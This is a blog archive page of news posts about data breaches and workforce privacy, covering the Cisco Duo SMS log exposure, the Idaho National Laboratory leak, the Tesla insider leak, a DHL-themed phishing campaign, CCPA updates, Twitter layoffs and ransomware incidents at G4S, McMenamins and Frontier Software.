Search This Blog
Powered by Blogger.

Blog Archive

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label Employee Data. Show all posts
VoIP
Cisco Data Breach Employee Data Information Security Multi-Factor Authentication (MFA) SMS Supply chain vulnerability third party VoIP

Cisco Duo raises awareness over a breach in third-party data security, revealing the exposure of SMS MFA logs.

 

In the ever-evolving landscape of cybersecurity, safeguarding sensitive information and ensuring secure access to corporate networks are paramount concerns for organizations worldwide. Recently, Cisco Duo, a leading provider of multi-factor authentication (MFA) and Single Sign-On services, found itself grappling with a significant breach that shed light on the evolving threats confronting modern enterprises. 

On April 1, 2024, Cisco Duo's security team sent out a warning to its extensive customer base regarding a cyberattack targeting their telephony provider, which handles the transmission of SMS and VoIP MFA messages. According to reports, threat actors leveraged employee credentials acquired through a sophisticated phishing attack to infiltrate the provider's systems. 

Following the breach, the attackers successfully obtained and extracted SMS and VoIP MFA message logs linked to specific Duo accounts, covering the timeframe from March 1, 2024, to March 31, 2024. The ramifications of this breach are deeply concerning. While the provider assured that the threat actors did not access the contents of the messages or utilize their access to send messages to customers, the stolen message logs contain data that could be exploited in targeted phishing campaigns. 

This poses a significant risk to affected organizations, potentially resulting in unauthorized access to sensitive information, including corporate credentials. In response to the breach, Cisco Duo swiftly mobilized, collaborating closely with the telephony provider to conduct a thorough investigation and implement additional security measures. The compromised credentials were promptly invalidated, and robust measures were instituted to fortify defenses and mitigate the risk of recurrence. 

Additionally, the provider furnished Cisco Duo with comprehensive access to all exposed message logs, enabling a meticulous analysis of the breach's scope and impact. Despite these proactive measures, Cisco Duo has urged affected customers to exercise heightened vigilance against potential SMS phishing or social engineering attacks leveraging the stolen information. Organizations are advised to promptly notify users whose phone numbers were contained in the compromised logs, educating them about the risks associated with social engineering tactics. 

Furthermore, Cisco has emphasized the importance of promptly reporting any suspicious activity and implementing proactive measures to mitigate potential threats. This incident serves as a stark reminder of the persistent and evolving threat landscape faced by organizations in today's digital age. As reliance on MFA and other security solutions intensifies, proactive monitoring, regular security assessments, and ongoing user education are indispensable components of an effective cybersecurity posture. 

Moreover, the Cisco Duo breach underscores the broader issue of supply chain vulnerabilities in cybersecurity. While organizations diligently fortify their internal defenses, they remain susceptible to breaches through third-party service providers. Hence, it is imperative for businesses to meticulously evaluate the security practices of their vendors and establish robust protocols for managing third-party risks. 

As the cybersecurity landscape continues to evolve, organizations must remain agile, adaptive, and proactive in their approach to cybersecurity. By prioritizing robust security measures, fostering a culture of cyber resilience, and fostering close collaboration with trusted partners, organizations can effectively mitigate risks and safeguard their digital assets in the face of evolving threats.
Read more »
SiegedSec
CISA Critical Data Data Breach Employee Data FBI Hacktivist group Idaho National Laboratory Nuclear Agency SiegedSec

Idaho National Laboratory Suffers Data Breach, Employee Data Compromised


Idaho National Laboratory, the nuclear energy testing lab that comprise of an estimated 5,700 experts, has recently suffered a major data breach in their systems.

The data breach took place last Sunday, on November 19. The stolen data comprise of the laboratory’s employees’ critical data, which was later leaked on online forums. 

The investigation on the breach is being carried out by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the FBI, who are working in collaboration with INL, a spokesperson informed. Physical addresses, bank account details, and Social Security numbers are among the data that are impacted.

In an interview regarding the incident, the spokesperson told local news outlet EastIdahoNews.com that the breach has impacted INL’s Oracle HCM system, a cloud-based workforce management platform that offers payroll and other HR solutions, was impacted by the attack.

SiegedSec, a self-entitled hacktivist group has since taken responsibility of the attack, following which it published a sample of the stolen employee data online, which included full names, dates of birth, email addresses, contact details and other identity info of the INL employees to their data breach forum. 

The group, which seems to have political motivations, was also accused in the past of stealing information from the Communities of Interest Cooperation Portal, an unclassified information-sharing portal run by NATO.

However, INL has not implied that the breach has had any impact on its classified information or nuclear research, and CISA did not immediately respond to the request for a comment. 

Regardless of whether the classified nuclear details were accessed by the threat actors, Colin Little, security engineer at the cybersecurity firm Centripetal, said it is "highly disconcerting that the staff generating that intellectual property and participating in the most advanced nuclear energy research and development have had their information leaked online."

"Now those who are politically motivated and would very much like to know the names and addresses of the top nuclear energy researchers in the U.S. have that data," he said. 

INL supports large-scale initiatives from the Department of Energy, the Department of Defense. The laboratory bills itself as "a world leader in securing critical infrastructure systems and improving the resiliency of vital national security and defense assets."

Read more »
User Security
Car Maker Data Breach Data Privacy Employee Data User Security

Tesla Begins Notifying Individuals Impacted in a Data Breach Incident

 

Tesla has acknowledged a data breach affecting around 75,000 individuals, but the incident is the result of a whistleblower leak rather than a malicious attack. 

The company informed US authorities that a data breach found in May exposed the personal information, including social security numbers, of over 75,700 people.

According to a notice letter issued to those affected, the data breach is the result of two former workers sending private data to the German news publication Handelsblatt. Tesla stated that the former employees "misappropriated the information in violation of Tesla's IT security and data protection policies." 

The leaked data includes names, contact information, and employment-related details for current and previous employees. Individuals affected are being offered credit monitoring and identity protection services. 

The leak was discovered in May when Handelsblatt claimed that a whistleblower had given it 100 Gb of private Tesla data. According to the publication, Tesla did not effectively protect the data of its partners, customers, and employees. 

The 'Tesla Files', which were leaked, apparently contained information on over 100,000 current and former employees, bank account information for customers, trade secrets for production, and customer concerns about driver assistance systems. The car maker has been reassured by Handelsblatt that it has no plans to publish the whistleblower's personal information. 

Given the circumstances of the incident, the chances of the exposed data being misused are minimal, with Tesla likely commencing the data breach disclosure process owing to legal constraints. Tesla has filed litigation against the employees responsible for the data breach, whose lawyer labelled the leaker as a "disgruntled former employee" when the leak was discovered. 

“These lawsuits resulted in the seizure of the former employees’ electronic devices that were believed to have contained the Tesla information. Tesla also obtained court orders that prohibit the former employees from further use, access, or dissemination of the data, subject to criminal penalties,” the car manufacturer noted in its recent breach notification.
Read more »
US Firm
Data Breach Data Leak Email Account Compromise Employee Data US Firm

Data of 2.5 Lakh Customers Sent to Personal Account by CFPB Employee

 

The Wall Street Journal reported that a consumer financial protection bureau (CFPB) employee sent records containing private information to a personal email address that included confidential supervisory information from 45 other financial institutions as well as personal information on roughly 256,000 customers at one financial institution.

The agency, which was already under siege from Republican lawmakers, presented the breach to Congress as a catastrophic incident. 

The emails contained customer information from seven businesses, although the majority of the personal data was linked to customers at one unnamed institution, a CFPB spokeswoman told the Journal. 

The incident was discovered by the agency for the first time in February, and it was revealed to lawmakers on March 21, according to the Journal. The reason the employee, who was later fired, forwarded the emails to a personal account was not disclosed by the CFPB. 

According to the CFPB, the personal information includes two spreadsheets with names and transaction-specific account numbers that were used internally by the financial institution, which downplays the severity of the data theft.

According to the representative, the spreadsheets do not contain the customers' bank account details and cannot be utilised to access a customer's account. As of Wednesday, the former CFPB employee had not complied with a request to erase the emails. Republican lawmakers seized on the data leak and demanded additional information from Director Rohit Chopra in statements they released. 

The CFPB has expanded enforcement efforts against the mortgage industry under Chopra, which has increased compliance expenses.

In October, Mortgage Bankers Association President and CEO Bob Broeksmit described the agency as a "judge, jury, and executioner all rolled into one." 

He urged the government to "establish clear and consistent standards, providing notice and comment when enacting rules." Unfortunately, the Bureau does not often follow this reasonable procedure, announcing new legal responsibilities without formal process or deliberation, enforcing novel and untested legal theories, and making it extremely difficult for businesses to grasp their legal obligations." 

Additionally, the agency is battling constitutional issues on various fronts. The agency's funding structure—by which it is funded by the Fed as opposed to appropriations legislation enacted through Congress—will be decided by the Supreme Court in a case that will be heard there. The agency's financing source was ruled to be illegal in 2022 by a panel of Trump appointees on the Fifth Circuit U.S. Court of Appeals. 

The funding provisions for the CFPB were found to be constitutional in March by the Second Circuit U.S. Court of Appeals, which includes the districts of Connecticut, New York, and Vermont.
Read more »
Security
Data Breach Data Leak Data Safety Employee Data Safety Security

Bogus DHL Emails Enable Attackers to Hack Microsoft 365 Accounts

 

As per experts, a new phishing campaign has been discovered that impersonates logistics giant DHL in order to steal Microsoft 365 credentials from victims in the education industry. Cybersecurity researchers from Armorblox recently found a significant phishing campaign, with more than 10,000 emails sent to inboxes connected to a "private education institution". 

The email is designed to appear to be from DHL, with the company branding and tone of voice one would expect from the shipping giant. The recipient is informed in the email titled "DHL Shipping Document/Invoice Receipt" that a customer sent a parcel to the incorrect address and that the correct delivery address must be provided.

False login prompt
The email apparently includes an attachment, labeled "Shipping Document Invoice Receipt," which, when opened, appears to be a blurred-out preview of a Microsoft Excel file.

A Microsoft login page appears over the blurred-out document, attempting to deceive people into believing they must log into their Microsoft 365 accounts in order to view the file's contents. If the victims provide the login credentials, they will be sent directly to the attackers.

Armorblox explained, “The email attack used language as the main attack vector in order to bypass both Microsoft Office 365 and EOP email security controls. These native email security layers are able to block mass spam and phishing campaigns and known malware and bad URLs. However, this targeted email attack bypassed Microsoft email security because it did not include any bad URLs or links and included an HTML file that included a malicious phishing form.”

Businesses can safeguard themselves against phishing attacks by training their employees to recognize red flags in their inboxes, such as the sender's email address, typos and spelling errors, a feeling of urgency (legitimate emails almost never require the user to respond urgently), and unexpected links/attachments.

According to the researchers, the attackers used a valid domain to avoid Microsoft's email(opens in new tab) authentication checks.
Read more »
User Privacy
California Cookies Data Privacy Laws Employee Data Privacy User Privacy

California's Consumer Privacy Act has Been Updated

 

California's unique consumer privacy law was strengthened on January 1 as a result of a ballot initiative that 2020 voters endorsed. A new privacy law that puts new requirements on companies to make sure that employees have more authority over the gathering and utilization of their personal data takes effect this year.

What does California's Consumer Privacy Act imply?

In June 2018, Governor Brown signed the California Consumer Privacy Act (CCPA) into law. A ground-breaking piece of legislation, it imposes requirements on California businesses regarding how they acquire, use, or disclose Californians' data and gives the people of California a set of data rights equal to those found in Europe.

The California Privacy Rights Act (CPRA), which amends the historic California CCPA by extending its protections to staff, job seekers, and independent contractors, will go into effect on January 1, 2023, and firms that employ California residents must ensure they have taken the necessary steps to comply by that date.

An updated version of CCPA

Residents of California can ask for their data to be updated, destroyed, or not sold as a result. These standards now also apply to employers for the first time.

If you've noticed those boxes at the bottom of almost every website asking about your preferences for data privacy, you know the California privacy legislation has a significant impact. Employment lawyer Darcey Groden of Fisher Phillips predicts that it will also apply to employers.

While many businesses have the infrastructure in place to deal with customer data, attorney Darcey Groden noted that the employment connection is significantly more complex. In the job situation, there is just a lot of data that is continually being collected.

In most cases, you will need to account for your human resources file, health information, emails, and surveillance footage. This law is exceedingly intricate and it will be expensive to adhere to it. According to Zoe Argento, it will be particularly difficult for businesses that do not deal with consumers, for instance, businesses in the manufacturing and construction industries.

Companies with many employees and gathering a lot of data, like gig platforms, could also be significantly impacted. They normally do not have a privacy department, so this is quite new to them. Increased accountability around how some platforms use worker data to design their algorithm may result from more transparency.




Read more »
User Privacy
Elon Musk Employee Data Privacy Subscription Twitter User Privacy

Over 50% of Twitter Staff are Sacked by Elon Musk


Elon Musk, the new owner of Twitter, defended the decision on Saturday, claiming that there was 'no choice because the firm was losing millions of dollars daily. This comes amid a wave of widespread layoffs at Twitter around the world, including in India, and the outrage that followed.

Elon Musk made the decision to fire over 50% of the Twitter workers. After overnight limiting access to the company's headquarters and internal systems, employees were notified by email of their employment status.

To announce their departure, employees are tweeting using the hashtag #LoveWhereYouWorked and a saluting emoji. Elon justified the choice by claiming that the business was losing $4 million daily. Three months' worth of severance pay was provided to everyone who lost their jobs.

In contrast to a profit of $66 million during the same period last year, the corporation reported a net loss of $270 million for the second quarter that concluded on June 30, 2022. There are rumors that up to half of Twitter's 8,000 jobs could be eliminated. The website has trouble turning a profit. Making a dent in the salary cost is one method to solve the issue.

Simon Balmain, a senior community manager for Twitter in the UK, said that he had been signed out of both his work laptop and the Slack chat app, leading him to fear that he had been fired.

After already terminating some employees, several Twitter employees on Thursday night filed a class action complaint, according to CNN, alleging that Twitter violated the federal and California Worker Adjustment and Retraining Notification Act (WARN Act).

According to the WARN Act, if a mass layoff "affects 50 or more employees at a single site of employment," the employer has to give 60 days written notice in advance. Additionally, Twitter has let go of the majority of its over 200 Indian staff. According to sources, the engineering, sales and marketing, and communications teams will all be affected".

Following Elon Musk's takeover of the social media company, Twitter founder Jack Dorsey finally spoke out about the widespread layoffs. He stated, " I realize many are angry with me. I own the responsibility for why everyone is in this situation: I grew the company size too quickly. I apologise for that.”

The cost-cutting comes in response to criticism of Twitter's efforts to collect money by putting up a proposal to charge $8 (£7) per month for a blue check-mark that says, "Verified."Those that pay could receive more promotion for their tweets and see fewer advertisements in addition to the verification badge.

Since a few years prior, Twitter has not turned a profit, and its monthly user base of around 300 million people has remained broadly stable. Experts cautioned that Twitter's ability to battle misinformation may be impacted by the dismissal of half of its workers, particularly with the US midterm elections set for next week.





Read more »
Ransomware
Data Breach Data Leak Employee Data G4S Ransomware

Australian Security Firm G4S Hacked, Staff on Alert


Ransomware Attack, G4S Breached

Present and earlier employees of security organization G4S have been alarmed to be cautious, due to a ransomware attack where personal information was stolen and posted online. The leaked info includes tax file numbers, medical checks, and bank account information. 

The attack comes after the massive Optus data leak incident in Australia, joining two more data breaches. It seeks government plans to reform cybersecurity and follow higher penalties under the Privacy Act.

G4S offers services to Australian prisons

G4S offers services to prisons throughout Australia, earlier it offered services to offshore detention centers on Manus Island, belonging to the federal government. 

It informed its former and current customers earlier this week that it suffered a cyber incident, allowing unauthorized access to a third party, and giving malware programs access to G4S systems. 

According to Guardian Australia, it believes the incident to be a ransomware attack targeting Port Philip prison. The media reported on this incident in early July. 

"Guardian Australia was also alerted on Tuesday to another Optus-style data breach involving an employment agency. The breach was the result of a similar open application programming interface (API) to that believed to have been breached in the Optus attack. Personal documents such as photos of passport pages and Covid-19 vaccination certificates were accessible via the vulnerability."

What can the victims do?

During mid-September, G4S came to know that some data was leaked online. However, it only informed the affected customers about the degree of the attack and the compromised documents in an e-mail earlier this week. 

The stolen data includes employee names, dates of birth, address, medical and police records, contact info, bank account details, tax file numbers, license details, and Medicare numbers. 

In some incidents, health info is given to the company, payslips, and Workcover claims information and incident reports have also been leaked.

Though the incident happened at Port Philip prison, the cyber criminal got access to the company's entire network throughout Australia. 

Casualties not confirmed

The number of staff impacted by the breach is yet to be known, G4S didn't give answers to questions about the victims, on the other hand, saying the company is working with affected individuals to provide them full assistance. 

G4S advised the victims to change their identity documents but didn't provide compensation for replacements or give credit monitoring. 

The Guardian reports:

"Separately, photos of identity documents – including driver licenses – of hundreds of thousands of the company’s clients were publicly available via Google image search results because users had uploaded their licences as their profile photo. The company has since acted to prevent users from uploading sensitive documents to profiles."





Read more »
User Security
Data Breach Data Leak Data Safety data security Employee Data User Data User Security

Attackers Compromise Employee Data at PVC-Maker Eurocell

According to a law firm, a leading British PVC manufacturer has been contacting current and former employees to notify them of a "substantial" data breach. 

A data protection law specialist, Derbyshire-based Eurocell, which also operates as a distributor of UPVC windows, doors, and roofing products, disclosed the news in a letter to those affected. The firm apparently explained in it that an unauthorised third party gained access to its systems, as per Hayes Connor.

The compromised data included employment terms and conditions, dates of birth, next of kin, bank account, NI and tax reference numbers, right-to-work documents, health and wellbeing documents, learning and development records, and disciplinary and grievance docs. That's a lot of information for potential fraudsters to use in subsequent phishing or even extortion.

Eurocell has reportedly stated that there is no proof of data misuse, but this will provide little comfort to those affected. It is also unknown how many employees would be affected.

“The company has over 2,000 current employees, but it is possible that many more former employees could also be at risk given the type of information that has been exposed,” warned Hayes Connor legal representative, Christine Sabino.

“Every employer has various obligations when it comes to data security, which means they have a duty to keep sensitive information secure. This type of incident warrants a significant investigation. Our team has started to make our own enquiries into the case and are determined to ensure our clients get the justice they deserve.”

Hayes Connor made headlines earlier this year when it announced that over 100 current and former employees of a leading luxury car dealership would sue the firm following a data breach. On that occasion, they were dissatisfied with LSH Auto's lack of transparency regarding the incident.
Read more »
Employee Data
Bug Bounty Cyber Security Data Privacy data security Employee Data

HackerOne Employee Stole Data From Bug Bounty Reports for Financial Advantages

 

HackerOne has revealed information on a former employee who it alleges accessed company data for personal financial benefit. The unknown individual received information from bug bounty platform security reports and attempted to reveal the same vulnerabilities outside of the site. 

According to HackerOne, he had access to the data between April 4 and June 23, 2022. On June 22, 2022, HackerOne was notified of the problem by a suspicious client who had received similar bug reports from the platform and the person. 

“This is a clear violation of our values, our culture, our policies, and our employment contracts,” the platform stated. 

“In under 24 hours, we worked quickly to contain the incident by identifying the then-employee and cutting off access to data. We have since terminated the employee, and further bolstered our defences to avoid similar situations in the future.” 

According to HackerOne, the submitter of this off-platform disclosure "reportedly used intimidating language in conversation with our customer," and the actor's intent was to collect more bounties. HackerOne also stated that, after consulting with lawyers, it will determine if a criminal referral of this situation is necessary. 

A HackerOne spokesperson informed The Daily Swig: “Since the founding of HackerOne, we have honoured our steadfast commitment to disclosing security incidents because we believe that sharing security information is essential to building a safer internet. 

“At HackerOne, we value the trusted relationships with our customers and the hacking community. It’s important for us to continue to demonstrate transparency as a core tenant of Corporate Security Responsibility and therefore shared this Incident Report.” 

The spokesperson added: “Our Code of Conduct sets the foundation for building trust. We will continue to prioritize coordinated disclosure and to act fast to ensure we uphold these strong standards.”
Read more »
Ransomware attack
Customer Data Cyber Attacks Cyber Data data security database Employee Data McMenamins Ransomware attack

McMenamins Struck by Ransomware Attack, Employee Data at Risk

 

McMenamins, a Portland hotel and brewpub chain, was struck by a ransomware attack on Wednesday that may have stolen employees' personal information, but no customer payment information seems to have been compromised. 

The ransomware attack was discovered and stopped on December 12, according to McMenamins. The company stated it alerted the FBI and contacted a cybersecurity firm to figure out where the attack came from and how extensive it was. 

Employee data such as names, residences, dates of birth, Social Security numbers, direct deposit bank account information, and benefits records may have been acquired, according to the firm in a news release, but "it is not currently known whether that is the case." 

"To provide employees with peace of mind, McMenamins will be offering employees identity and credit protection services, as well as a dedicated helpline through Experian," the company stated. "A payment processing service manages the collection of such information. Further, this information is not stored on company computer systems impacted by the attack."  

Many operational systems have been taken offline, including credit card scanners, necessitating temporary alterations in payment procedures at some McMenamins sites. There is "no indication" that consumer payment data has been hacked, according to the firm. 

The co-owner, Brian McMenamin stated, “What makes this breach especially disheartening is that it further adds to the strain and hardship our employees have been through in the past two years.” 

“We ask that our customers give our employees extra grace as we make temporary adjustments in the way we process transactions and reservations, given the impacts to our systems by this breach.” 

The company stated that it is unclear when the problem would be rectified and systems restored. There are a few things firms can do to assist mitigate these attacks, according to Kerry Tomlinson, a cyber news reporter with Ampere News. 

"As a business, you need to have backups," Tomlinson said. "If ransomware hits and they're demanding ransom for you to get your files back, you can say thanks a lot but I already have backups." 

"It will happen more and more and it's only going to get bigger. If you're not paying attention now, you need to pay attention." 

Employees should be especially cautious to help prevent cyber assaults, according to Tomlinson, by avoiding questionable emails, setting unique passwords for each website visited, and adding a multi-factor authentication process to offer an extra layer of security. It is worth noting that despite the breach, all McMenamins locations are open.
Read more »
User Security
Data Breach Employee Data Ransomware attack User Security

Personal Details of SA Gov Employees Compromised in Frontier Software Ransomware Attack

 

The South Australian government has revealed that the private details belonging to tens of thousands of its employees were exfiltrated following a cyber attack that hit the system of an external payroll provider Frontier software.

According to South Australia Treasurer Rob Lucas, the payroll provider has informed the government that some of the data have been leaked on the dark web, with at least 38,000 employees and up to 80,000 government employees possibly having their data accessed. 

The stolen data contained taxation IDs of 38,000 Australian government employees, information on names, date of birth, home address, bank account details, employment start date, payroll period, remuneration, and other payroll-related details.

The government was particularly concerned regarding staff’s private data being stolen, as well as the potential for identity fraud, but there was no evidence that the information had been used by the hackers, Lucas added.

The breached firm Frontier Software suffered from a ransomware attack on November 13, 2021. The assault didn't pivot to client systems through their products and the data exfiltration only affected a specific segmented environment, the payroll provider stated. 

"To date, our investigations show no evidence of any customer data being exfiltrated or stolen. Whilst the incident resulted in some of Frontier Software's Australian corporate systems being encrypted, Australian customer HR & Payroll data and systems are segmented from the corporate systems and were not compromised," it said on November 17.

The impacted staff has been advised to treat incoming emails, calls, and SMS with caution. Additionally, everyone is advised to reset their passwords and activate two-factor authentication where possible. 

Government employees should closely monitor bank statements and account activity and report any suspicious transactions to the authorities. Exposed people can take advantage of a free IDCARE cyber-security support service offering, following the instructions laid out on the incident announcement on the SA government website.

According to Nev Kitchin, general secretary of the South Australian Public Service Association, the situation was "obviously very concerning". "We expect the state government to take all possible steps to review its cyber security measures in order to prevent such an event in the future. In the meantime, we expect the government to do everything possible to minimize the effects of this security breach and to provide the support our members need," he said.
Read more »
Subscribe to: Posts (Atom)